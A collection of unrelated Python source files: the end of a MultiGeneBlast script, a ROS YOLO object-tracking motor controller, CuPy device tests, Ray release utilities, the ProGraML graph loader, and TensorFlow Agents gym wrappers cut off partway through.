htmloutfile.write(htmlparts[-1])
#Copy accessory files for HTML viewing
#if sys.platform == ('win32'):
# copycommand1 = "copy/y vis\\* " + genomename + " > nul"
# copycommand2 = "copy/y vis\\html\\* " + genomename + "\\html > nul"
# copycommand3 = "copy/y vis\\images\\* " + genomename + "\\images > nul"
#elif sys.platform == ('linux2'):
# copycommand1 = "cp vis/* " + genomename + " > /dev/null"
# copycommand2 = "cp -r vis/html " + genomename + "/html > /dev/null"
# copycommand3 = "cp -r vis/images " + genomename + "/images > /dev/null"
#os.system(copycommand1)
#os.system(copycommand2)
#os.system(copycommand3)
#Close open html file
htmloutfile.close()
def create_xhtml_file(queryclusterdata, clusters, clusterblastpositiondata, nucname, page, pages, screenwidth, blastdetails, mgb_scores, musclegroups, colorschemedict, dbtype):
htmloutfile, htmlparts = create_xhtml_template(queryclusterdata, page, pages)
write_xhtml_output(htmloutfile, queryclusterdata, clusters, clusterblastpositiondata, nucname, page, screenwidth, blastdetails, mgb_scores, musclegroups, colorschemedict, dbtype)
finalize_xhtml(htmloutfile, htmlparts)
def move_outputfiles(foldername, pages):
global MGBPATH
#Move output files to specified output folder. Overwriting when files/folders are already present there
try:
os.mkdir(foldername)
except:
pass
try:
shutil.rmtree(foldername + os.sep + "svg")
except:
pass
try:
shutil.rmtree(foldername + os.sep + "fasta")
except:
pass
for page in range(pages):
try:
os.remove(foldername + os.sep + dbname + "displaypage" + str(page + 1) + ".xhtml")
except:
pass
try:
shutil.move(dbname + "displaypage" + str(page + 1) + ".xhtml", foldername + os.sep + dbname + "displaypage" + str(page + 1) + ".xhtml")
except:
pass
filestomove = [dbname + "clusterblast_output.txt", "svg", "fasta"]
frame_update()
for f in filestomove:
try:
os.remove(foldername + os.sep + f)
except:
try:
shutil.rmtree(foldername + os.sep + f)
except:
pass
try:
shutil.move(f, foldername + os.sep + f)
except:
pass
frame_update()
filestocopy = ["style.css", "jquery.svg.js", "jquery-1.4.2.min.js", "jquery.svgdom.js"]
for f in filestocopy:
try:
os.remove(foldername + os.sep + f)
except:
pass
shutil.copy(MGBPATH + os.sep + f, foldername + os.sep + f)
folderstocopy = ["images"]
for f in folderstocopy:
try:
shutil.rmtree(foldername + os.sep + f)
except:
pass
shutil.copytree(MGBPATH + os.sep + f, foldername + os.sep + f)
def main():
global GUI
global TEMP
global MGBPATH
os.environ['BLASTDB'] = MGBPATH
os.chdir(TEMP)
GUI = "n"
starttime = time.time()
opts = Options()
#Step 1: parse options
parse_options(sys.argv, opts)
dbname = opts.db
global dbname
print "Step 1/11: Time since start: " + str((time.time() - starttime))
#Step 2: Read GBK / EMBL file, select genes from requested region and output FASTA file
proteins, genomic_accnr, dnaseqlength, nucname, querytags, names, seqs, seqdict, arch_search = read_input_file(opts.infile, opts.startpos, opts.endpos, opts.ingenes, opts.gui)
print "Step 2/11: Time since start: " + str((time.time() - starttime))
#Step 3: Run internal BLAST
internalhomologygroupsdict, seqlengths = internal_blast(opts.minseqcov, opts.minpercid, names, proteins, seqdict, opts.nrcpus)
print "Step 3/11: Time since start: " + str((time.time() - starttime))
#Step 4: Run BLAST on genbank_mf database
blastoutput = db_blast(names, seqs, opts.db, opts.nrcpus, opts.hitspergene, opts.dbtype)
print "Step 4/11: Time since start: " + str((time.time() - starttime))
#Step 5: Parse BLAST output
blastdict, querylist = parse_blast(blastoutput, opts.minseqcov, opts.minpercid, seqlengths, seqdict, opts.db, opts.dbtype)
print "Step 5/11: Time since start: " + str((time.time() - starttime))
#Step 6: Load genomic databases into memory
nucdescriptions, nucdict, proteininfo = load_databases(querylist, blastdict, opts.nrcpus, opts.db, opts.dbtype)
print "Step 6/11: Time since start: " + str((time.time() - starttime))
#Step 7: Locate Blast hits in genomes
blastdict, geneposdict, hitclusters, clusters, multiplehitlist = find_genomic_loci(blastdict, nucdict, proteininfo, opts.distancekb, querylist, nucdescriptions, dnaseqlength)
print "Step 7/11: Time since start: " + str((time.time() - starttime))
#Step 8: Score Blast output on all loci
opts.pages = score_blast_output(hitclusters, querylist, blastdict, multiplehitlist, proteins, proteininfo, querytags, opts.infile, clusters, nucdescriptions, opts.pages, arch_search, opts.syntenyweight)
print "Step 8/11: Time since start: " + str((time.time() - starttime))
#Output. From here, iterate for every page
for page in [pagenr + 1 for pagenr in range(opts.pages)]:
#Step 9: Write MultiGeneBlast SVGs
queryclusterdata, colorschemedict, clusterblastpositiondata, blastdetails, mgb_scores = write_svgs(page, opts.screenwidth, internalhomologygroupsdict, arch_search)
print "Step 9/11, page " + str(page) + ": Time since start: " + str((time.time() - starttime))
#Step 10: Create muscle alignments
musclegroups = align_muscle(opts.muscle, colorschemedict, seqdict)
print "Step 10/11, page " + str(page) + ": Time since start: " + str((time.time() - starttime))
#Step 11: Create XHTML output file
create_xhtml_file(queryclusterdata, clusters, clusterblastpositiondata, nucname, page, opts.pages, opts.screenwidth, blastdetails, mgb_scores, musclegroups, colorschemedict, opts.dbtype)
print "Step 11/11, page " + str(page) + ": Time since start: " + str((time.time() - starttime))
#Move all files to specified output folder
move_outputfiles(opts.outputfolder, opts.pages)
#Close log file
print "MultiGeneBlast successfully finished in " + str((time.time() - starttime)) + " seconds.\n"
if __name__ == '__main__':
freeze_support()
main()
|
detect_motor_test3.py
|
#!/usr/bin/env python
#!coding=utf-8
import rospy
import numpy as np
import PIL.Image as pilimage
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from std_msgs.msg import Float64
from cv_bridge import CvBridge, CvBridgeError
import cv2
import time
from yolo import YOLO
from sensor_msgs.msg import Joy
from std_msgs.msg import String
from geometry_msgs.msg import Twist
from tf.transformations import *
from math import pi
from geometry_msgs.msg import PoseStamped
from std_msgs.msg import Header
from sensor_msgs.msg import JointState
from threading import Thread
import threading
global RV2_motor1_joint
yolo = YOLO()
bridge = CvBridge()
def send():
rospy.Subscriber('/mid_camera/color/image_raw/compressed', CompressedImage, ReceiveVideo_right)
rospy.spin()
def ReceiveVideo_right(data):
global cv_image
# print(1)
cv_image = bridge.compressed_imgmsg_to_cv2(data, 'bgr8')
def main():
global delta_x,cv_image
time.sleep(4)
fps = 0
while not rospy.is_shutdown():
t1 = time.time()
# 读取某一帧
frame = cv2.cvtColor(cv_image,cv2.COLOR_BGR2RGB)
# 转变成Image
frame = pilimage.fromarray(np.uint8(frame))
# 进行检测
frame, bbox_list, label_list = yolo.detect_image(frame)
frame = np.array(frame)
# RGBtoBGR满足opencv显示格式
frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)
fps = ( fps + (1./(time.time()-t1)) ) / 2
print("fps= %.2f"%(fps))
frame = cv2.putText(frame, "fps= %.2f"%(fps), (0, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
print(frame.shape)
cv2.imshow("video",frame)
cv2.waitKey(3)
# c= cv2.waitKey(1) & 0xff
# if c==27:
# break
if type(label_list) != int: # 没检测到物体的时候,bbox_list和label_list为1
num_of_obj = len(label_list)
#print('num_of_object:', num_of_obj)
#确定跟踪物体与图像中点的相对坐标
for i in range(num_of_obj):
if 'banana' in label_list[i]:
object_center = (bbox_list[i][1]+bbox_list[i][3])*0.5
delta_x = 320-object_center
#print(delta_x)
#return delta_x
# location_pub.publish(delta_x)
#motor1_move()
elif 'bed' in label_list[i]:
print("yyy")
pass
else:
print('yolo未识别到任何物体')
pass
def motor1_move():
time.sleep(1)
global command_vel_pub_m, delta_x, RV2_motor1_joint
delta_x = 0
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
# rospy.Subscriber('/joint_states_motor',JointState,RV2_motorjointstate_callback)
while not rospy.is_shutdown():
print(delta_x)
#中间位判断
if -1.5 < RV2_motor1_joint < 1.5:
#左转判断条件
if delta_x > 200:
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_x < 200:
motor_vel.velocity = [(delta_x - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#右转判断条件
elif delta_x < -200:
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_x < -80:
motor_vel.velocity = [(delta_x + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#停止判断条件
elif -80 < delta_x < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
#左限位判断条件
if 1.5 < RV2_motor1_joint:
#左转判断条件
if delta_x > 80:
motor_vel.velocity = [0]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#右转判断条件
elif delta_x < -200:
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_x < -80:
motor_vel.velocity = [(delta_x + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#停止判断条件
elif -80 < delta_x < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
#右限位判断条件
if RV2_motor1_joint < -1.5:
#左转判断条件
if delta_x > 200:
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_x < 200:
motor_vel.velocity = [(delta_x - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#右转判断条件
elif delta_x < -80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#停止判断条件
elif -80 < delta_x < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
else:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
#for object in vision_database_dict:
# 再将opencv格式额数据转换成ros image格式的数据发布
# try:
# #self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, "bgr8"))
# location_pub.publish(location_pub)
# except CvBridgeError as e:
# print('e')
def RV2_motorjointstate_callback(data):
# 定义RV2 motor数据全局变量,进行赋值
global RV2_motor1_joint
RV2_motor1_joint = data.position[0]
print(RV2_motor1_joint)
if __name__ == '__main__':
# 初始化ros节点
rospy.init_node("cv_bridge_test")
rospy.loginfo("Starting cv_bridge_test node")
global command_vel_pub_m, delta_x
#创建发布者
command_vel_pub_m = rospy.Publisher('/motor_control/input/velocity', JointState, queue_size = 100, latch=True)
#订阅躯干点击位置信息
rospy.Subscriber('/joint_states_motor',JointState,RV2_motorjointstate_callback)
#定义yolo识别子程序
t_send = threading.Thread(target = send)
t_send.start()
t_main = threading.Thread(target=main)
t_main.start()
#time.sleep(2)
# 定义躯干运动子进程
t_motor1 = threading.Thread(target = motor1_move)
t_motor1.start()
rospy.spin()
# except KeyboardInterrupt:
# print("Shutting down cv_bridge_test node.")
# cv2.destroyAllWindows()
|
test_device.py
|
import re
import threading
import unittest
import pytest
import cupy
from cupy import cuda
from cupy.cuda import runtime
from cupy import testing
class TestDeviceComparison(unittest.TestCase):
def check_eq(self, result, obj1, obj2):
if result:
assert obj1 == obj2
assert obj2 == obj1
assert not (obj1 != obj2)
assert not (obj2 != obj1)
else:
assert obj1 != obj2
assert obj2 != obj1
assert not (obj1 == obj2)
assert not (obj2 == obj1)
def test_equality(self):
self.check_eq(True, cuda.Device(0), cuda.Device(0))
self.check_eq(True, cuda.Device(1), cuda.Device(1))
self.check_eq(False, cuda.Device(0), cuda.Device(1))
self.check_eq(False, cuda.Device(0), 0)
self.check_eq(False, cuda.Device(0), None)
self.check_eq(False, cuda.Device(0), object())
def test_lt_device(self):
assert cuda.Device(0) < cuda.Device(1)
assert not (cuda.Device(0) < cuda.Device(0))
assert not (cuda.Device(1) < cuda.Device(0))
def test_le_device(self):
assert cuda.Device(0) <= cuda.Device(1)
assert cuda.Device(0) <= cuda.Device(0)
assert not (cuda.Device(1) <= cuda.Device(0))
def test_gt_device(self):
assert not (cuda.Device(0) > cuda.Device(0))
assert not (cuda.Device(0) > cuda.Device(0))
assert cuda.Device(1) > cuda.Device(0)
def test_ge_device(self):
assert not (cuda.Device(0) >= cuda.Device(1))
assert cuda.Device(0) >= cuda.Device(0)
assert cuda.Device(1) >= cuda.Device(0)
def check_comparison_other_type(self, obj1, obj2):
with pytest.raises(TypeError):
obj1 < obj2
with pytest.raises(TypeError):
obj1 <= obj2
with pytest.raises(TypeError):
obj1 > obj2
with pytest.raises(TypeError):
obj1 >= obj2
with pytest.raises(TypeError):
obj2 < obj1
with pytest.raises(TypeError):
obj2 <= obj1
with pytest.raises(TypeError):
obj2 > obj1
with pytest.raises(TypeError):
obj2 >= obj1
def test_comparison_other_type(self):
self.check_comparison_other_type(cuda.Device(0), 0)
self.check_comparison_other_type(cuda.Device(0), 1)
self.check_comparison_other_type(cuda.Device(1), 0)
self.check_comparison_other_type(cuda.Device(1), None)
self.check_comparison_other_type(cuda.Device(1), object())
@testing.gpu
class TestDeviceAttributes(unittest.TestCase):
def test_device_attributes(self):
d = cuda.Device()
attributes = d.attributes
assert isinstance(attributes, dict)
assert all(isinstance(a, int) for a in attributes.values())
# test a specific attribute that would be present on any supported GPU
assert 'MaxThreadsPerBlock' in attributes
def test_device_attributes_error(self):
with pytest.raises(cuda.runtime.CUDARuntimeError):
# try to retrieve attributes from a non-existent device
cuda.device.Device(cuda.runtime.getDeviceCount()).attributes
@testing.gpu
class TestDevicePCIBusId(unittest.TestCase):
def test_device_get_pci_bus_id(self):
d = cuda.Device()
pci_bus_id = d.pci_bus_id
assert re.match(
'^[a-fA-F0-9]{4}:[a-fA-F0-9]{2}:[a-fA-F0-9]{2}.[a-fA-F0-9]',
pci_bus_id
)
def test_device_by_pci_bus_id(self):
d1 = cuda.Device()
d2 = cuda.Device.from_pci_bus_id(d1.pci_bus_id)
assert d1 == d2
d3 = cuda.Device(d2)
assert d2 == d3
with pytest.raises(cuda.runtime.CUDARuntimeError) as excinfo:
cuda.Device.from_pci_bus_id('fake:id')
assert excinfo == 'cudaErrorInvalidValue: invalid argument'
with pytest.raises(cuda.runtime.CUDARuntimeError) as excinfo:
cuda.Device.from_pci_bus_id('FFFF:FF:FF.F')
assert excinfo == 'cudaErrorInvalidDevice: invalid device ordinal'
@testing.gpu
class TestDeviceHandles(unittest.TestCase):
def _check_handle(self, func):
handles = [func(), None, None]
def _subthread():
handles[1] = func()
handles[2] = func()
t = threading.Thread(target=_subthread)
t.start()
t.join()
assert handles[0] is not None
assert handles[0] != handles[1]
assert handles[1] == handles[2]
def test_cublas_handle(self):
self._check_handle(cuda.get_cublas_handle)
def test_cusolver_handle(self):
self._check_handle(cuda.device.get_cusolver_handle)
def test_cusolver_sp_handle(self):
self._check_handle(cuda.device.get_cublas_handle)
@pytest.mark.xfail(
runtime.is_hip, reason='ROCm/HIP sparse support is not yet ready')
def test_cusparse_handle(self):
self._check_handle(cuda.device.get_cusparse_handle)
class TestDeviceFromPointer(unittest.TestCase):
def test_from_pointer(self):
assert cuda.device.from_pointer(cupy.empty(1).data.ptr).id == 0
|
util.py
|
import collections
import hashlib
import json
import os
import subprocess
import threading
import time
from typing import Callable, Dict, Any
import requests
from anyscale.sdk.anyscale_client.sdk import AnyscaleSDK
from ray_release.logger import logger
ANYSCALE_HOST = os.environ.get("ANYSCALE_HOST", "https://console.anyscale.com")
def deep_update(d, u):
for k, v in u.items():
if isinstance(v, collections.abc.Mapping):
d[k] = deep_update(d.get(k, {}), v)
else:
d[k] = v
return d
def dict_hash(dt: Dict[Any, Any]) -> str:
json_str = json.dumps(dt, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
def url_exists(url: str):
return requests.head(url).status_code == 200
def format_link(link: str):
# Use ANSI escape code to allow link to be clickable
# https://buildkite.com/docs/pipelines/links-and-images
# -in-log-output
if os.environ.get("BUILDKITE_COMMIT"):
return "\033]1339;url='" + link + "'\a\n"
# Else, no buildkite:
return link
def anyscale_project_url(project_id: str):
return (
f"{ANYSCALE_HOST}"
f"/o/anyscale-internal/projects/{project_id}"
f"/?tab=session-list"
)
def anyscale_cluster_url(project_id: str, session_id: str):
return (
f"{ANYSCALE_HOST}"
f"/o/anyscale-internal/projects/{project_id}"
f"/clusters/{session_id}"
)
def anyscale_cluster_compute_url(compute_tpl_id: str):
return (
f"{ANYSCALE_HOST}"
f"/o/anyscale-internal/configurations/cluster-computes"
f"/{compute_tpl_id}"
)
def anyscale_cluster_env_build_url(build_id: str):
return (
f"{ANYSCALE_HOST}"
f"/o/anyscale-internal/configurations/app-config-details"
f"/{build_id}"
)
_anyscale_sdk = None
def get_anyscale_sdk() -> AnyscaleSDK:
global _anyscale_sdk
if _anyscale_sdk:
return _anyscale_sdk
_anyscale_sdk = AnyscaleSDK()
return _anyscale_sdk
# Todo: remove to get rid of threading
def run_with_timeout(
fn: Callable[[], None],
timeout: float,
status_fn: Callable[[float], None],
error_fn: Callable[[], None],
status_interval: float = 30.0,
*args,
**kwargs,
):
start_time = time.monotonic()
next_status = start_time + status_interval
stop_event = threading.Event()
thread = threading.Thread(target=fn, args=(stop_event,) + args, kwargs=kwargs)
thread.start()
while thread.is_alive() and time.monotonic() < start_time + timeout:
if time.monotonic() > next_status:
next_status += status_interval
status_fn(time.monotonic() - start_time)
time.sleep(1)
if thread.is_alive():
stop_event.set()
error_fn()
def exponential_backoff_retry(f, retry_exceptions, initial_retry_delay_s, max_retries):
retry_cnt = 0
retry_delay_s = initial_retry_delay_s
while True:
try:
return f()
except retry_exceptions as e:
retry_cnt += 1
if retry_cnt > max_retries:
raise
logger.info(
f"Retry function call failed due to {e} "
f"in {retry_delay_s} seconds..."
)
time.sleep(retry_delay_s)
retry_delay_s *= 2
def run_bash_script(bash_script: str):
subprocess.run(f"bash {bash_script}", shell=True, check=True)
|
graph_loader.py
|
# Copyright 2019-2020 the ProGraML authors.
#
# Contact Chris Cummins <chrisc.101@gmail.com>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Train a GGNN to estimate solutions for classic data flow problems.
This script reads ProGraML graphs and uses a GGNN to predict binary
classification targets for data flow problems.
"""
import pathlib
import random
import threading
from queue import Queue
from typing import Iterable
from typing import Tuple
from labm8.py import app
from labm8.py import humanize
from labm8.py import pbutil
from programl.graph.format.py import cdfg
from programl.models import base_graph_loader
from programl.proto import epoch_pb2
from programl.proto import program_graph_features_pb2
from programl.proto import program_graph_pb2
app.DEFINE_integer(
"max_graph_node_count",
60000,
"The maximum node count in a single graph. Graphs with greater than this "
"many nodes are ignored. Use this to prevent OOM errors when loading very "
"large graphs.",
)
FLAGS = app.FLAGS
class DataflowGraphLoader(base_graph_loader.BaseGraphLoader):
"""A graph loader for dataflow graphs and features."""
def __init__(
self,
path: pathlib.Path,
epoch_type: epoch_pb2.EpochType,
analysis: str,
seed: int = None,
min_graph_count: int = None,
max_graph_count: int = None,
data_flow_step_max: int = None,
logfile=None,
use_cdfg: bool = False,
require_inst2vec: bool = False,
max_queue_size: int = 512,
):
self.graph_path = path / epoch_pb2.EpochType.Name(epoch_type).lower()
if not self.graph_path.is_dir():
raise FileNotFoundError(str(self.graph_path))
self.labels_path = path / "labels" / analysis
if not self.labels_path.is_dir():
raise FileNotFoundError(str(self.labels_path))
# Configuration options.
self.min_graph_count = min_graph_count
self.max_graph_count = max_graph_count
self.data_flow_step_max = data_flow_step_max
self.seed = seed
self.logfile = logfile
self.use_cdfg = use_cdfg
self.require_inst2vec = require_inst2vec
# The number of graphs that have been skipped.
self.skip_count = 0
# For every file that a graph loader reads, there is the possibility that
# the contents of the file are never used, such as in the case of an empty
# graph, or a features file where all of the features are excluded. We keep
# track of these useless files so that if we every need to read them again
# we know that we can skip them and save ourselves a disk access.
self._excluded_graph_files = set()
self._outq = Queue(maxsize=max_queue_size)
self._thread = threading.Thread(target=self._Worker)
self._thread.start()
self._stopped = False
def Stop(self):
if self._stopped:
return
self._stopped = True
# Read whatever's left in the
while self._thread.is_alive():
if self._outq.get(block=True) is not None:
break
self._thread.join()
def __iter__(
self,
) -> Iterable[
Tuple[
program_graph_pb2.ProgramGraph,
program_graph_features_pb2.ProgramGraphFeatures,
]
]:
value = self._outq.get(block=True)
while value is not None:
yield value
value = self._outq.get(block=True)
self._thread.join()
def _Worker(self):
"""Threaded graph reader."""
graph_files = list(self.graph_path.iterdir())
app.Log(
2, "Enumerated %s graph files to load", humanize.Commas(len(graph_files))
)
graph_count = 0
while not self.min_graph_count or graph_count < self.min_graph_count:
# Strip any graph files that we have earmarked for ignoring.
graph_files = [
f for f in graph_files if f not in self._excluded_graph_files
]
# We may have run out of files.
if not graph_files:
self._Done(graph_count)
return
if self.seed:
# If we are setting a reproducible seed, first sort the list of files
# since iterdir() order is undefined, then seed the RNG for the
# shuffle.
graph_files = sorted(graph_files, key=lambda x: x.name)
# Change the seed so that on the next execution of this loop we will
# chose a different random ordering.
self.seed += 1
random.Random(self.seed).shuffle(graph_files)
for graph_path in graph_files:
if self._stopped:
break
stem = graph_path.name[: -len("ProgramGraph.pb")]
name = f"{stem}ProgramGraphFeaturesList.pb"
features_path = self.labels_path / name
# There is no guarantee that we have generated features for this
# program graph, so we check for its existence. As a *very* defensive
# measure, we also check for the existence of the graph file that we
# enumerated at the start of this function. This check can be removed
# later, it is only useful during development when you might be
# modifying the dataset at the same time as having test jobs running.
if not graph_path.is_file() or not features_path.is_file():
self.skip_count += 1
continue
# Read the graph from disk, maybe performing a cheeky wee conversion
# to CDFG format.
app.Log(3, "Read %s", features_path)
if self.use_cdfg:
graph = cdfg.FromProgramGraphFile(graph_path)
else:
graph = pbutil.FromFile(graph_path, program_graph_pb2.ProgramGraph())
if not graph:
app.Log(2, "Failed to load graph %s", graph_path)
self._excluded_graph_files.add(graph_path)
continue
# Skip empty graphs.
if not len(graph.node) or len(graph.node) > FLAGS.max_graph_node_count:
app.Log(
2,
"Graph node count %s is not in range (1,%s]",
len(graph.node),
FLAGS.max_graph_node_count,
)
self._excluded_graph_files.add(graph_path)
continue
# Skip a graph without inst2vec
if self.require_inst2vec and not len(
graph.features.feature["inst2vec_annotated"].int64_list.value
):
app.Log(2, "Skipping graph without inst2vec annotations")
continue
features_list = pbutil.FromFile(
features_path, program_graph_features_pb2.ProgramGraphFeaturesList()
)
# Iterate over the features list to yield <graph, features> pairs.
skipped_all_features = True
for j, features in enumerate(features_list.graph):
step_count_feature = features.features.feature[
"data_flow_step_count"
].int64_list.value
step_count = step_count_feature[0] if len(step_count_feature) else 0
if self.data_flow_step_max and step_count > self.data_flow_step_max:
self.skip_count += 1
app.Log(
3,
"Skipped graph with data_flow_step_count %d > %d "
"(skipped %d / %d, %.2f%%)",
step_count,
self.data_flow_step_max,
self.skip_count,
(graph_count + self.skip_count),
(self.skip_count / (graph_count + self.skip_count)) * 100,
)
continue
graph_count += 1
if self.logfile:
self.logfile.write(f"{features_path} {j}\n")
self._outq.put((graph, features), block=True)
skipped_all_features = False
if self.max_graph_count and graph_count >= self.max_graph_count:
app.Log(2, "Stopping after reading %d graphs", graph_count)
self._Done(graph_count)
return
if skipped_all_features:
self._excluded_graph_files.add(graph_path)
self._Done(graph_count)
def _Done(self, graph_count: int) -> None:
if self._excluded_graph_files:
app.Log(
2,
"Graph loader loaded %s graphs. %s files were ignored",
humanize.Commas(graph_count),
humanize.Commas(len(self._excluded_graph_files)),
)
self._outq.put(None)
if self.logfile:
self.logfile.close()
|
wrappers.py
|
# Copyright 2017 The TensorFlow Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for OpenAI Gym environments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import multiprocessing
import sys
import traceback
import gym
import gym.spaces
import numpy as np
import tensorflow as tf
class AutoReset(object):
"""Automatically reset environment when the episode is done."""
def __init__(self, env):
self._env = env
self._done = True
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._done:
observ, reward, done, info = self._env.reset(), 0.0, False, {}
else:
observ, reward, done, info = self._env.step(action)
self._done = done
return observ, reward, done, info
def reset(self):
self._done = False
return self._env.reset()
class ActionRepeat(object):
"""Repeat the agent action multiple steps."""
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class RandomStart(object):
"""Perform random number of random actions at the start of the episode."""
def __init__(self, env, max_steps):
self._env = env
self._max_steps = max_steps
def __getattr__(self, name):
return getattr(self._env, name)
def reset(self):
observ = self._env.reset()
random_steps = np.random.randint(0, self._max_steps)
for _ in range(random_steps):
action = self._env.action_space.sample()
observ, unused_reward, done, unused_info = self._env.step(action)
if done:
tf.logging.warning('Episode ended during random start.')
return self.reset()
return observ
class FrameHistory(object):
"""Augment the observation with past observations."""
def __init__(self, env, past_indices, flatten):
"""Augment the observation with past observations.
Implemented as a Numpy ring buffer holding the necessary past observations.
Args:
env: OpenAI Gym environment to wrap.
past_indices: List of non-negative integers indicating the time offsets
from the current time step of observations to include.
flatten: Concatenate the past observations rather than stacking them.
Raises:
KeyError: The current observation is not included in the indices.
"""
if 0 not in past_indices:
raise KeyError('Past indices should include 0 for the current frame.')
self._env = env
self._past_indices = past_indices
self._step = 0
self._buffer = None
self._capacity = max(past_indices) + 1
self._flatten = flatten
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low = np.repeat(low[None, ...], len(self._past_indices), 0)
high = np.repeat(high[None, ...], len(self._past_indices), 0)
if self._flatten:
low = np.reshape(low, (-1,) + low.shape[2:])
high = np.reshape(high, (-1,) + high.shape[2:])
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
self._step += 1
self._buffer[self._step % self._capacity] = observ
observ = self._select_frames()
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
self._buffer = np.repeat(observ[None, ...], self._capacity, 0)
self._step = 0
return self._select_frames()
def _select_frames(self):
indices = [
(self._step - index) % self._capacity for index in self._past_indices]
observ = self._buffer[indices]
if self._flatten:
observ = np.reshape(observ, (-1,) + observ.shape[2:])
return observ
class FrameDelta(object):
"""Convert the observation to a difference from the previous observation."""
def __init__(self, env):
self._env = env
self._last = None
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low, high = low - high, high - low
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
delta = observ - self._last
self._last = observ
return delta, reward, done, info
def reset(self):
observ = self._env.reset()
self._last = observ
return observ
class RangeNormalize(object):
"""Normalize the specialized observation and action ranges to [-1, 1]."""
def __init__(self, env, observ=None, action=None):
self._env = env
self._should_normalize_observ = (
observ is not False and self._is_finite(self._env.observation_space))
if observ is True and not self._should_normalize_observ:
raise ValueError('Cannot normalize infinite observation range.')
if observ is None and not self._should_normalize_observ:
tf.logging.info('Not normalizing infinite observation range.')
self._should_normalize_action = (
action is not False and self._is_finite(self._env.action_space))
if action is True and not self._should_normalize_action:
raise ValueError('Cannot normalize infinite action range.')
if action is None and not self._should_normalize_action:
tf.logging.info('Not normalizing infinite action range.')
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
space = self._env.observation_space
if not self._should_normalize_observ:
return space
low, high = -np.ones(space.shape), np.ones(space.shape)
return gym.spaces.Box(low, high)
@property
def action_space(self):
space = self._env.action_space
if not self._should_normalize_action:
return space
low, high = -np.ones(space.shape), np.ones(space.shape)
return gym.spaces.Box(low, high)
def step(self, action):
if self._should_normalize_action:
action = self._denormalize_action(action)
observ, reward, done, info = self._env.step(action)
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ
def _denormalize_action(self, action):
min_ = self._env.action_space.low
max_ = self._env.action_space.high
action = (action + 1) / 2 * (max_ - min_) + min_
return action
def _normalize_observ(self, observ):
min_ = self._env.observation_space.low
max_ = self._env.observation_space.high
observ = 2 * (observ - min_) / (max_ - min_) - 1
return observ
def _is_finite(self, space):
return np.isfinite(space.low).all() and np.isfinite(space.high).all()
class ClipAction(object):
"""Clip out of range actions to the action space of the environment."""
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
shape = self._env.action_space.shape
low, high = -np.inf * np.ones(shape), np.inf * np.ones(shape)
return gym.spaces.Box(low, high)
def step(self, action):
action_space = self._env.action_space
action = np.clip(action, action_space.low, action_space.high)
return self._env.step(action)
class LimitDuration(object):
"""End episodes after specified number of steps."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
